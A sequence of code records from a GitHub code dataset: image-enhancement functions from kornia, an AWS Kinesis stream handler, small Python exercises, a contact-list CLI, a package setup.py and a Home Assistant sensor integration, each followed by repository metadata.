torch.nn.functional.conv2d(input, kernel, bias=None, stride=1, groups=input.size(1))\n degenerate = torch.clamp(degenerate, 0., 1.)\n\n mask = torch.ones_like(degenerate)\n padded_mask = torch.nn.functional.pad(mask, [1, 1, 1, 1])\n padded_degenerate = torch.nn.functional.pad(degenerate, [1, 1, 1, 1])\n result = torch.where(padded_mask == 1, padded_degenerate, input)\n\n def _blend_one(input1: torch.Tensor, input2: torch.Tensor, factor: Union[float, torch.Tensor]) -> torch.Tensor:\n if isinstance(factor, torch.Tensor):\n factor = factor.squeeze()\n assert len(factor.size()) == 0, f\"Factor shall be a float or single element tensor. Got {factor}\"\n if factor == 0.:\n return input1\n if factor == 1.:\n return input2\n diff = (input2 - input1) * factor\n res = input1 + diff\n if factor > 0. and factor < 1.:\n return res\n return torch.clamp(res, 0, 1)\n if isinstance(factor, (float)) or len(factor.size()) == 0:\n return _blend_one(input, result, factor)\n return torch.stack([_blend_one(input[i], result[i], factor[i]) for i in range(len(factor))])\n\n\n# Code taken from: https://github.com/pytorch/vision/pull/796\ndef _scale_channel(im):\n \"\"\"Scale the data in the channel to implement equalize.\"\"\"\n im = im * 255\n\n # Compute the histogram of the image channel.\n histo = torch.histc(im, bins=256, min=0, max=255)\n # For the purposes of computing the step, filter out the nonzeros.\n nonzero_histo = torch.reshape(histo[histo != 0], [-1])\n step = (torch.sum(nonzero_histo) - nonzero_histo[-1]) // 255\n\n def build_lut(histo, step):\n # Compute the cumulative sum, shifting by step // 2\n # and then normalization by step.\n lut = (torch.cumsum(histo, 0) + (step // 2)) // step\n # Shift lut, prepending with 0.\n lut = torch.cat([torch.zeros(1, device=lut.device), lut[:-1]])\n # Clip the counts to be in range. This is done\n # in the C code for image.point.\n return torch.clamp(lut, 0, 255)\n\n # If step is zero, return the original image. 
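The posterize helpers above aim to zero out the low-order bits of each 8-bit channel by shifting right and then left again. The intended effect, restated on a plain integer so the round trip is easy to verify by hand (the value 173 is arbitrary):

```python
def posterize_value(v: int, bits: int) -> int:
    # Scalar restatement of the tensor round trip above: keep the `bits`
    # highest bits of an 8-bit value and zero the rest.
    if bits == 0:
        return 0
    if bits == 8:
        return v
    shift = 8 - bits
    return (v >> shift) << shift

print(posterize_value(173, 3))  # 160, i.e. 0b10101101 -> 0b10100000
```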
Otherwise, build\n # lut from the full histogram and step and then index from it.\n if step == 0:\n result = im\n else:\n # can't index using 2d index. Have to flatten and then reshape\n result = torch.gather(build_lut(histo, step), 0, im.flatten().long())\n result = result.reshape_as(im)\n\n return result / 255.\n\n\ndef equalize(input: torch.Tensor) -> torch.Tensor:\n r\"\"\"Apply equalize on the input tensor.\n Implements Equalize function from PIL using PyTorch ops based on uint8 format:\n https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L352\n\n Args:\n input (torch.Tensor): image tensor with shapes like :math:(C, H, W) or :math:(B, C, H, W) to equalize.\n\n Returns:\n torch.Tensor: Sharpened image or images.\n \"\"\"\n input = _to_bchw(input)\n\n res = []\n for image in input:\n # Assumes RGB for now. Scales each channel independently\n # and then stacks the result.\n scaled_image = torch.stack([_scale_channel(image[i, :, :]) for i in range(len(image))])\n res.append(scaled_image)\n return torch.stack(res)\n\n\ndef equalize3d(input: torch.Tensor) -> torch.Tensor:\n r\"\"\"Equalizes the values for a 3D volumetric tensor.\n\n Implements Equalize function for a sequence of images using PyTorch ops based on uint8 format:\n https://github.com/tensorflow/tpu/blob/master/models/official/efficientnet/autoaugment.py#L352\n\n Args:\n input (torch.Tensor): image tensor with shapes like :math:(C, D, H, W) or :math:(B, C, D, H, W) to equalize.\n\n Returns:\n torch.Tensor: Sharpened image or images with same shape as the input.\n \"\"\"\n input = _transform_input3d(input)\n\n res = []\n for volume in input:\n # Assumes RGB for now. Scales each channel independently\n # and then stacks the result.\n scaled_input = torch.stack([_scale_channel(volume[i, :, :, :]) for i in range(len(volume))])\n res.append(scaled_input)\n\n return torch.stack(res)\n\n\nclass AdjustSaturation(nn.Module):\n r\"\"\"Adjust color saturation of an image.\n\n The input image is expected to be an RGB image in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n saturation_factor (float): How much to adjust the saturation. 0 will give a black\n and white image, 1 will give the original image while 2 will enhance the saturation\n by a factor of 2.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, saturation_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustSaturation, self).__init__()\n self.saturation_factor: Union[float, torch.Tensor] = saturation_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_saturation(input, self.saturation_factor)\n\n\nclass AdjustHue(nn.Module):\n r\"\"\"Adjust hue of an image.\n\n The input image is expected to be an RGB image in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n hue_factor (float): How much to shift the hue channel. Should be in [-PI, PI]. PI\n and -PI give complete reversal of hue channel in HSV space in positive and negative\n direction respectively. 0 means no shift. 
Therefore, both -PI and PI will give an\n image with complementary colors while 0 gives the original image.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, hue_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustHue, self).__init__()\n self.hue_factor: Union[float, torch.Tensor] = hue_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_hue(input, self.hue_factor)\n\n\nclass AdjustGamma(nn.Module):\n r\"\"\"Perform gamma correction on an image.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Tensor to be adjusted in the shape of (\\*, N).\n gamma (float): Non negative real number, same as γ\\gammaγ in the equation.\n gamma larger than 1 make the shadows darker, while gamma smaller than 1 make\n dark regions lighter.\n gain (float, optional): The constant multiplier. Default 1.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, gamma: Union[float, torch.Tensor], gain: Union[float, torch.Tensor] = 1.) -> None:\n super(AdjustGamma, self).__init__()\n self.gamma: Union[float, torch.Tensor] = gamma\n self.gain: Union[float, torch.Tensor] = gain\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_gamma(input, self.gamma, self.gain)\n\n\nclass AdjustContrast(nn.Module):\n r\"\"\"Adjust Contrast of an image. This implementation aligns OpenCV, not PIL. Hence,\n the output differs from TorchVision.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image to be adjusted in the shape of (\\*, N).\n contrast_factor (Union[float, torch.Tensor]): Contrast adjust factor per element\n in the batch. 0 generates a compleatly black image, 1 does not modify\n the input image while any other non-negative number modify the\n brightness by this factor.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, contrast_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustContrast, self).__init__()\n self.contrast_factor: Union[float, torch.Tensor] = contrast_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_contrast(input, self.contrast_factor)\n\n\nclass AdjustBrightness(nn.Module):\n r\"\"\"Adjust Brightness of an image. This implementation aligns OpenCV, not PIL. Hence,\n the output differs from TorchVision.\n\n The input image is expected to be in the range of [0, 1].\n\n Args:\n input (torch.Tensor): Image/Input to be adjusted in the shape of (\\*, N).\n brightness_factor (Union[float, torch.Tensor]): Brightness adjust factor per element\n in the batch. 
0 does not modify the input image while any other number modify the\n brightness.\n\n Returns:\n torch.Tensor: Adjusted image.\n \"\"\"\n\n def __init__(self, brightness_factor: Union[float, torch.Tensor]) -> None:\n super(AdjustBrightness, self).__init__()\n self.brightness_factor: Union[float, torch.Tensor] = brightness_factor\n\n def forward(self, input: torch.Tensor) -> torch.Tensor: # type: ignore\n return adjust_brightness(input, self.brightness_factor)\n","repo_name":"manyids2/kornia","sub_path":"kornia/enhance/adjust.py","file_name":"adjust.py","file_ext":"py","file_size_in_byte":25214,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"24123407937","text":"###########################################################################\n# Script Written By: Anshul Chandra\n#\n# For CSC 724 Project at North Carolina State University\n###########################################################################\n\nimport boto3\nimport os\nimport sys\n\n'''\n Class for handling the Kinesis data stream creation/deletion for ConSys\n'''\nclass KinesisHandler():\n\n def __init__(self):\n if os.environ.get('AWS_SECRET_ACCESS_KEY') == None or os.environ.get('AWS_ACCESS_KEY_ID') == None or os.environ.get('AWS_REGION_NAME') == None:\n print('Environment variables for AWS configuration not found')\n sys.exit()\n\n # Fetch Access keys from environment vars\n self.AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n self.AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n self.AWS_REGION_NAME = os.environ['AWS_REGION_NAME']\n\n self.kinesisClient = boto3.client('kinesis',\n aws_access_key_id = self.AWS_ACCESS_KEY_ID,\n aws_secret_access_key = self.AWS_SECRET_ACCESS_KEY,\n region_name = self.AWS_REGION_NAME)\n\n '''\n Method to create data stream\n streamName: name of the data stream to be created\n shardCount: number of shards in the new stream to be created\n '''\n def createKinesisDataStream(self, streamName, shardCount):\n response = self.kinesisClient.create_stream(\n StreamName = streamName,\n ShardCount = shardCount\n )\n\n if response:\n print('Kinesis data stream ' + streamName + ' created successfully\\n')\n print('Response:', response)\n else:\n print('Unable to create data stream')\n\n\n '''\n Method to delete data stream\n streamName: name of the stream to be deleted\n '''\n def deleteKinesisDataStream(self, streamName):\n response = self.kinesisClient.delete_stream(\n StreamName = streamName\n )\n\n if response:\n print('Kinesis data stream ' + streamName + ' deleted successfully\\n')\n print('Response:', response)\n else:\n print('Unable to delete data stream')\n\nif __name__ == '__main__':\n\n objKinesis = KinesisHandler()\n\n streamName = 'ADS_CONSYS'\n\n if len(sys.argv) > 1:\n for i in range(1, len(sys.argv)):\n if sys.argv[i] == '-h':\n # Display help info.\n print(\"\\n\\t-c: Create Kinesis data stream\")\n print(\"\\t-d: Delete Kinesis data stream\\n\")\n sys.exit()\n\n for i in range(1, len(sys.argv)):\n if sys.argv[i] == '-c':\n # Create data stream\n objKinesis.createKinesisDataStream(streamName, 4)\n if sys.argv[i] == '-d':\n # Delete data stream\n objKinesis.deleteKinesisDataStream(streamName)\n else:\n print('Please use -h for help')\n sys.exit()\n else:\n print('Please use -h for help')\n 
sys.exit()\n","repo_name":"ggverma/Console-Log-Analyzer","sub_path":"Utilities/KinesisHandler.py","file_name":"KinesisHandler.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"14485218559","text":"class Stack(object):\r\n def __init__(self, length):\r\n self.length = length\r\n self.vector = [None] * self.length\r\n self.top = -1\r\n \r\n def isEmpty(self):\r\n return self.top == -1\r\n \r\n def isFully(self):\r\n return self.top == self.length-1\r\n \r\n def push(self, element):\r\n if not self.isFully():\r\n self.top += 1\r\n self.vector[self.top] = element\r\n else:\r\n raise Exception('stack is fully')\r\n \r\n def pop(self):\r\n if not self.isEmpty():\r\n self.top -= 1\r\n return self.vector[self.top+1]\r\n else:\r\n raise Exception('stack is empty')\r\n\r\n\r\nclass Queue(object):\r\n\r\n def __init__(self, lenght):\r\n self.stack_one = Stack(lenght)\r\n self.stack_two = Stack(lenght)\r\n\r\n def insert(self, element):\r\n self.stack_one.push(element)\r\n\r\n def remove(self):\r\n while self.stack_one.top != -1:\r\n self.stack_two.push(self.stack_one.pop())\r\n\r\n aux = self.stack_two.pop()\r\n print(aux)\r\n\r\n while self.stack_two.top != -1:\r\n self.stack_one.push(self.stack_two.pop())\r\n\r\n return aux\r\n\r\n\r\nq = Queue(4)\r\nq.insert(0)\r\nq.insert(0)\r\nq.insert(0)\r\nq.insert(0)\r\n\r\nq.remove()\r\nq.remove()\r\nq.remove()\r\nq.remove()\r\n\r\n\r\n\r\n\r\n","repo_name":"lucasstonehc/Python","sub_path":"Exercicio5.py","file_name":"Exercicio5.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33030083939","text":"\"\"\"\n\tMaster Historian\n\n\tCreated by Jan Tomesek on 4.9.2019.\n\"\"\"\n\n__author__ = \"Jan Tomesek\"\n__email__ = \"tomesek.j@gmail.com\"\n__copyright__ = \"Copyright 2019, Jan Tomesek\"\n\n\nimport os\nimport numpy as np\nimport time\nfrom statistics import mean\n\nclass MasterHistorian:\n \"\"\"\n Superclass for storing, writing and loading history.\n Provides epoch time measuring.\n \"\"\"\n\n def __init__(self, outputPath, tag='MasterHistorian'):\n self.outputPath = outputPath\n\n self.tag = tag\n\n self.startEpochTime = 0\n self.epochTimeHistory = []\n\n print('[{}] Initialized'.format(self.tag))\n\n def onEpochStart(self, epoch):\n # Start epoch time\n currentTime = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n print('[{}] {}: Epoch {} start'.format(self.tag, currentTime, epoch))\n\n self.startEpochTime = time.time()\n\n def onEpochEnd(self, epoch):\n # End epoch time\n endEpochTime = time.time()\n\n epochTime = endEpochTime - self.startEpochTime\n self.epochTimeHistory.append(epochTime)\n\n hours, minutes = self.__toHoursAndMinutes(epochTime)\n\n currentTime = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n print('[{}] {}: Epoch {} end (epoch took {}h {}min)'.format(self.tag, currentTime, epoch, hours, minutes))\n\n def __toHoursAndMinutes(self, seconds):\n hours = round(seconds // 3600)\n remaining = seconds - (hours * 3600)\n minutes = round(remaining // 60)\n\n return hours, minutes\n\n def showSummary(self):\n print('[{}] -------------------- Summary --------------------'.format(self.tag))\n print('')\n\n\n # Times\n print('[{}] -------- Times --------'.format(self.tag))\n\n # Epoch times\n for index, epochTime in enumerate(self.epochTimeHistory):\n hours, minutes = self.__toHoursAndMinutes(epochTime)\n print('[{}] Epoch 
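The two-stack `Queue` above drains `stack_one` into `stack_two` and back again on every `remove`, so each dequeue costs O(n). A common variant leaves elements in the output stack between calls, so each element crosses over at most once and dequeues are amortized O(1). The sketch below follows that refactoring; it is not the original author's design:

```python
class AmortizedQueue:
    def __init__(self):
        self._in, self._out = [], []

    def insert(self, element):
        self._in.append(element)

    def remove(self):
        if not self._out:
            # Reverse the input stack only when the output side runs dry,
            # so each element is moved at most once overall.
            while self._in:
                self._out.append(self._in.pop())
        if not self._out:
            raise Exception('queue is empty')
        return self._out.pop()

q = AmortizedQueue()
for i in range(4):
    q.insert(i)
print([q.remove() for _ in range(4)])  # [0, 1, 2, 3]
```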
{}: \t {}h {}min'.format(self.tag, index+1, hours, minutes))\n        print('')\n\n        # Average epoch time\n        averageEpochTime = mean(self.epochTimeHistory)\n        averageHours, averageMinutes = self.__toHoursAndMinutes(averageEpochTime)\n        print('[{}] Average: \\t {}h {}min'.format(self.tag, averageHours, averageMinutes))\n\n        # Total epoch time\n        totalEpochTime = sum(self.epochTimeHistory)\n        totalHours, totalMinutes = self.__toHoursAndMinutes(totalEpochTime)\n        print('[{}] Total: \\t {}h {}min'.format(self.tag, totalHours, totalMinutes))\n\n    def load(self, overridden=False):\n        self.epochTimeHistory = np.load(os.path.join(self.outputPath, 'epochTimeHistory'+'.npy')).tolist()\n\n        if (not overridden):\n            print('[{}] History successfully loaded'.format(self.tag))\n\n    def write(self, overridden=False):\n        np.save(os.path.join(self.outputPath, 'epochTimeHistory'), self.epochTimeHistory)\n\n        if (not overridden):\n            print('[{}] History successfully written'.format(self.tag))\n","repo_name":"JanTomesek/CrossLocate","sub_path":"CrossLocate/core/MasterHistorian.py","file_name":"MasterHistorian.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"1300710878","text":"#---------- expected-answer loading code -----------------\nimport datetime\nimport sys\nNUM = 1\nsys.stdin=open(f\"/Users/gimdongmin/Desktop/파이썬 알고리즘 강의/섹션 6/9. 수열 추측하기/in{NUM}.txt\",\"rt\")\nfile = open(f\"/Users/gimdongmin/Desktop/파이썬 알고리즘 강의/섹션 6/9. 수열 추측하기/out{NUM}.txt\")\nanswer = file.read()\nprint(f\"answer : \\n{answer}\")\nprint(f\"{'-'*50}\")\n#----------------------------------------\n\n#------------ my solution code -----------------\nfrom itertools import permutations\nimport time\ndef solution(): # using permutations\n    start = time.time()\n    n,f = map(int, input().split())\n    lis = [i for i in range(1,n+1)]\n    new = list(permutations(lis,n))\n    for i in new:\n        temp = list(i)\n        for _ in range(n):\n            for j in range(len(temp)-1):\n                temp[j] = temp[j]+temp[j+1]\n            if len(temp)>1:\n                temp.pop()\n            else:\n                if temp[0] == f:\n                    for k in i:\n                        print(k,end=\" \")\n                    end = time.time()\n                    print(f\"{end - start:.5f} sec\")\n                    return\n# solution()\n\n#----------- video-lecture solution code -------------------\n# def dfs(l,sum):\n#     global end\n#     global start\n#     if l==n and sum==f:\n#         for x in p:\n#             print(x, end=\" \")\n#         end = time.time()\n#         print(f\"{end - start:.5f} sec\")\n#         sys.exit(0)\n#     else:\n#         for i in range(1,n+1):\n#             if not ch[i]:\n#                 ch[i] = 1\n#                 p[l] = i\n#                 dfs(l+1,sum+(p[l]*b[l]))\n#                 ch[i] = 0\n#\n# start = time.time()\n# n,f = map(int, input().split())\n# p=[0]*n\n# b=[1]*n\n# ch=[0]*(n+1)\n# for i in range(1,n):\n#     b[i] = (b[i-1]*(n-i))//i # how to compute the binomial coefficients\n# dfs(0,0)\n\ndef library_solution(): # using the itertools library\n    start = time.time()\n    n, f = map(int, input().split())\n    b=[1]*n\n    for i in range(1,n):\n        b[i] = (b[i-1]*(n-i))//i # how to compute the binomial coefficients\n    a = list(range(1,n+1))\n    for tmp in permutations(a,n):\n        check = 0\n        for i,x in enumerate(tmp):\n            check+=(x*b[i])\n        if check == f:\n            for k in tmp:\n                print(k,end=\" \")\n            end = time.time()\n            print(f\"{end - start:.5f} sec\")\n            return\nlibrary_solution()","repo_name":"kdm0320/Min_project","sub_path":"인프런 파이썬 강의/섹션6-(백트래킹, 상태트리, Cut Edge) - DFS/수열 추측하기.py","file_name":"수열 추측하기.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37544915378","text":"import collections\nimport getopt\nimport json\nimport random\nimport string\nimport sys\n\n\nARRAY_FRACTION = 0.5\n\n\nflat_paths = 
collections.defaultdict(lambda: set())\narray_paths = {}\n\n\ndef random_string(length=5):\n \"\"\"Generate a random string of fixed length\"\"\"\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\n\ndef random_value():\n \"\"\"Generate a random value to insert in the object\"\"\"\n return random.randint(0, 10000)\n\n\ndef random_path(length):\n \"\"\"Produce a random path of the given length\"\"\"\n return '.'.join(random_string() for _ in range(length))\n\n\ndef set_value(doc, path, value):\n \"\"\"Set a value at the dot-separated path string in the document\"\"\"\n parts = path.split('.')\n for part in parts[:-1]:\n if part not in doc:\n doc[part] = {}\n doc = doc[part]\n\n doc[parts[-1]] = value\n\n\ndef generate_json(num_attributes, total_nesting):\n \"\"\"Generate an object with the given number of attributes and nesting\"\"\"\n global array_paths, flat_paths\n\n # Partition attributes based on nesting\n nesting_indexes = set(range(total_nesting))\n nested_picks = set()\n for _ in range(num_attributes):\n n = random.choice(tuple(nesting_indexes))\n nesting_indexes.remove(n)\n nested_picks.add(n)\n\n # Group attributes by the nested depth\n nested_picks = list(sorted(nested_picks))\n attr_counts = collections.defaultdict(lambda: 0)\n for i in range(1, len(nested_picks)):\n attr_counts[nested_picks[i] - nested_picks[i - 1]] += 1\n nesting = sum(k * v for (k, v) in attr_counts.items())\n attr_counts[total_nesting - nesting] += 1\n attr_counts = dict(attr_counts)\n\n # Decide if each attribute should be flat or an array\n array_counts = {}\n flat_counts = {}\n for (k, v) in attr_counts.items():\n if random.random() > ARRAY_FRACTION:\n array_counts[k] = v\n else:\n flat_counts[k] = v\n\n # Generate new array paths if needed\n for (depth, _) in array_counts.items():\n if depth not in array_paths:\n new_path = random_path(depth)\n while new_path in array_paths.values():\n new_path = random_path(depth)\n array_paths[depth] = new_path\n\n # Generate new flat paths if needed\n for (depth, count) in flat_counts.items():\n while len(flat_paths[depth]) < count:\n new_path = random_path(depth)\n while new_path in flat_paths[depth]:\n new_path = random_path(depth)\n flat_paths[depth].add(new_path)\n\n doc = {}\n\n # Assign array values\n for (depth, count) in array_counts.items():\n set_value(doc,\n array_paths[depth],\n [random_value() for _ in range(depth)])\n\n # Assign flat values\n for (depth, count) in flat_counts.items():\n for path in random.sample(flat_paths[depth], count):\n set_value(doc, path, random_value())\n\n return doc\n\n\ndef usage(out=sys.stdout):\n \"\"\"Print usage information\"\"\"\n out.write(' '.join([\n 'usage: %s' % sys.argv[0],\n '[-c|--count ]',\n '[-a|--atributes ]',\n '[-n|--nesting ]\\n'\n ]))\n\n\ndef main():\n try:\n opts, _ = getopt.getopt(sys.argv[1:],\n 'hc:a:n:',\n ['help', 'count=', 'attributes=', 'nesting='])\n except getopt.GetoptError as err:\n sys.stderr.write(str(err) + '\\n')\n usage(sys.stderr)\n sys.exit(2)\n\n count = 10\n attributes = 10\n nesting = 20\n for opt, value in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-c\", \"--count\"):\n count = int(value)\n elif opt in (\"-a\", \"--attributes\"):\n attributes = int(value)\n elif opt in (\"-n\", \"--nesting\"):\n nesting = int(value)\n else:\n assert False, \"unhandled option\"\n\n for _ in range(count):\n print(json.dumps(generate_json(attributes, nesting)))\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"michaelmior/random-json","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70677116682","text":"import json\nclass ContactList:\n \n def __init__(self):\n self.contacts = []\n \n\n def load(self):\n file = open('contacts.json', 'r')\n data = json.loads(file.read())\n dictionaries = data['contacts']\n self.contacts = dictionaries\n \n \n def count(self):\n return len(self.contacts)\n\n \n def save(self): \n self_dict = {}\n self_dict.update({'contacts' : self.contacts})\n with open('contacts.json' , 'w') as file :\n saved = json.dumps(self_dict)\n file.write(saved)\n file.close()\n \n \n def print(self): \n for x in range(len(self.contacts)) :\n print(self.contacts[x]['name'])\n print(self.contacts[x]['phone_number'])\n print(self.contacts[x]['email'])\n print(\" \")\n \n\n def add(self, name, phone_number, email):\n new_contact = {\n 'name' : name ,\n 'phone_number' : phone_number ,\n 'email' : email\n }\n self.contacts.append(new_contact)\n print(self.contacts)\n\n \n def remove(self, name):\n for x in range(len(self.contacts)) :\n if self.contacts[x]['name'] == name :\n del self.contacts[x]\n break\n \n \n def update(self, old_name, new_name, new_phone_number, new_email):\n for x in range(len(self.contacts)) :\n if self.contacts[x]['name'] == old_name :\n self.contacts[x]['name'] = new_name\n self.contacts[x]['phone_number'] = new_phone_number\n self.contacts[x]['email'] = new_email\n\n\n\n\ncontact_list = ContactList() \ncontact_list.load()\nprint('Welcome to the Contact List App (CLA)')\nwhile True:\n command = input('Enter a command: ')\n if command == 'load':\n contact_list.load()\n print(f'Loaded ${contact_list.count()} contacts.')\n elif command == 'save':\n contact_list.save()\n print(f'Saved ${contact_list.count()} contacts.')\n elif command == 'print':\n contact_list.print()\n elif command == 'add':\n print('Enter info of contact to add:')\n name = input('Name: ')\n phone_number = input('Phone Number: ')\n email = input('Email: ')\n contact_list.add(name, phone_number, email)\n elif command == 'remove':\n name = input('Name of contact to remove: ')\n contact_list.remove(name)\n elif command == 'update':\n print('Enter info of contact to add:')\n old_name = input('Name of contact to update: ')\n new_name = input('New Name: ')\n new_phone_number = input('New Phone Number: ')\n new_email = input('New Email: ')\n contact_list.update(old_name, new_name, new_phone_number, new_email)\n elif command == 'help':\n print('Available commands:')\n print('load - load all contacts from the file')\n print('save - save contacts to a file')\n print('print - print all contacts')\n print('add - add a new contact')\n print('remove - remove a contact')\n print('update - update a contact')\n print('exit - exit the program')\n elif command == 'exit':\n break\n else:\n print('Command not recognized')\n","repo_name":"PdxCodeGuild/HB3","sub_path":"code/kelsie/lab09/lab09_kelsie.py","file_name":"lab09_kelsie.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"72158601161","text":"from __future__ import print_function\n\nimport os\nimport subprocess\nimport sys\n\nfrom distutils.command.build import build # type: ignore\n\nfrom setuptools import (\n find_packages,\n setup,\n Command\n)\n\nimport sciencebeam_trainer_delft\n\n\nwith 
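The `ContactList` above persists everything under a single top-level `contacts` key. A quick round-trip of that schema, useful for sanity-checking that `save` and `load` are symmetric; the contact data here is hypothetical:

```python
import json

contacts = [{'name': 'Ada', 'phone_number': '555-0100', 'email': 'ada@example.com'}]
blob = json.dumps({'contacts': contacts})        # what save() writes
assert json.loads(blob)['contacts'] == contacts  # what load() reads back
```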
open(os.path.join('requirements.txt'), 'r') as f:\n REQUIRED_PACKAGES = f.readlines()\n\nwith open(os.path.join('requirements.delft.txt'), 'r') as f:\n DELFT_PACKAGES = f.readlines()\n\nwith open('README.md', 'r') as f:\n long_description = f.read()\n\n\ndef _run_command(command_args):\n print('Running command: %s' % command_args)\n with subprocess.Popen(\n command_args,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as process:\n stdout_data, _ = process.communicate()\n print('Command output: %s' % stdout_data)\n if process.returncode != 0:\n raise RuntimeError(\n 'Command %s failed: exit code: %s (output: %s)' %\n (command_args, process.returncode, stdout_data)\n )\n\n\ndef _is_delft_installed():\n try:\n import delft # noqa pylint: disable=unused-import, import-outside-toplevel\n return True\n except ImportError:\n return False\n\n\ndef _install_delft():\n _run_command(\n [sys.executable, '-m', 'pip', 'install', '--no-deps']\n + DELFT_PACKAGES\n )\n\n\ndef _install_delft_if_not_installed():\n if _is_delft_installed():\n print('delft already installed, skipping')\n else:\n _install_delft()\n\n\nclass CustomCommands(Command):\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n _install_delft_if_not_installed()\n\n\nclass CustomBuild(build):\n \"\"\"A build command class that will be invoked during package install.\n The package built using the current setup.py will be staged and later\n installed in the worker using `pip install package'. This class will be\n instantiated during install for this specific scenario and will trigger\n running the custom commands specified.\n \"\"\"\n sub_commands = build.sub_commands + [('CustomCommands', None)]\n\n\npackages = find_packages()\n\nsetup(\n name='sciencebeam_trainer_delft',\n version=sciencebeam_trainer_delft.__version__,\n install_requires=REQUIRED_PACKAGES,\n packages=packages,\n include_package_data=True,\n description='ScienceBeam Trainer DeLFT',\n cmdclass={\n 'build': CustomBuild,\n 'CustomCommands': CustomCommands\n },\n url='https://github.com/elifesciences/sciencebeam-trainer-delft',\n license='MIT',\n keywords=\"sciencebeam delft\",\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"elifesciences/sciencebeam-trainer-delft","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"26261487191","text":"import logging\n\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorStateClass,\n SensorEntityDescription,\n)\nfrom homeassistant.const import (\n UnitOfTemperature,\n ATTR_UNIT_OF_MEASUREMENT,\n)\nfrom .coordinator import getCoordinator\n\n_LOGGER = logging.getLogger(__name__)\n\ndef discover_sensors(cts600):\n \"\"\" Create entity descriptors based on scanning the CTS600 data menu. 
\"\"\"\n data = cts600.data\n metaData = cts600.metaData\n sensors = []\n\n for e in data:\n sed = SensorEntityDescription(key = e, name = e.replace('_', ' ').lower())\n description = metaData[e]['description'] if e in metaData and 'description' in metaData[e] else None\n kind = metaData[e]['kind'] if e in metaData and 'kind' in metaData[e] else None\n\n if description:\n sed.name = sed.name + \" (\" + description.replace('_', ' ').capitalize() + \")\"\n\n if kind == 'temperature':\n sed.name = sed.name[0].upper() + sed.name[1:]\n sed.state_class = SensorStateClass.MEASUREMENT\n sed.device_class = SensorDeviceClass.TEMPERATURE\n sed.native_unit_of_measurement = UnitOfTemperature.CELSIUS\n\n sensors.append(sed)\n\n return sensors\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback) -> None:\n \"\"\" foo \"\"\"\n _LOGGER.debug (\"%s setup_entry: %s\", __name__, entry.data)\n await async_setup_platform (hass, entry.data, async_add_entities)\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n async_add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the platform.\"\"\"\n coordinator = await getCoordinator (hass, config)\n await coordinator.updateData()\n discovered_sensors = discover_sensors(coordinator.cts600)\n async_add_entities([CTS600Sensor (coordinator, e, None) for e in discovered_sensors], update_before_add=True)\n\nclass CTS600Sensor(CoordinatorEntity, SensorEntity):\n \"\"\"An entity using CoordinatorEntity.\n\n The CoordinatorEntity class provides:\n should_poll\n async_update\n async_added_to_hass\n available\n\n \"\"\"\n\n def __init__(\n self, coordinator, description: SensorEntityDescription, entry_id: str\n ) -> None:\n 